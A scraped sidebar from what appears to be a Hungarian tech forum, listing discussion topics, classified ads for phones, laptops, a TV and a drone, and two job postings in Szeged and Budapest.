- HiFi műszaki szemmel - sztereó hangrendszerek
- Fujifilm X
- Linux kezdőknek
- iGO Primo
- További aktív témák...
- HP Zbook 15 G3 laptop (15,6FHD/I7-G6/16GB/256SSD/AMD2GB/MagyarVilágítós/Win11)
- Apple iPhone 13 128GB, Kártyafüggetlen, 1 Év Garanciával
- Apple iPhone 13 Pro 128GB, Kártyafüggetlen, 1 Év Garanciával
- Új csak kipróbált Smartech 55 139cm Qled 4K UHD Quantum tv google assistant,Netflix, stb
- DJI Mini 4 pro - Fly More Combo - RC2 drón szett +128GB SanDisk SD
- Országosan a legjobb BANKMENTES részletfizetési konstrukció! Dell G15 5530
- Windows, Office licencek kedvező áron, egyenesen a Microsoft-tól - Automata kézbesítés utalással is!
- iKing.Hu - Apple iPhone 14 Plus - Yellow - Használt, karcmentes
- Samsung Galaxy A13 64GB, Kártyafüggetlen, 1 Év Garanciával
- REFURBISHED és ÚJ - HP USB-C/A Universal Dock G2 docking station (5TW13AA) (DisplayLink)
Állásajánlatok
Cég: PC Trade Systems Kft.
Város: Szeged
Cég: Liszt Ferenc Zeneművészeti Egyetem
Város: Budapest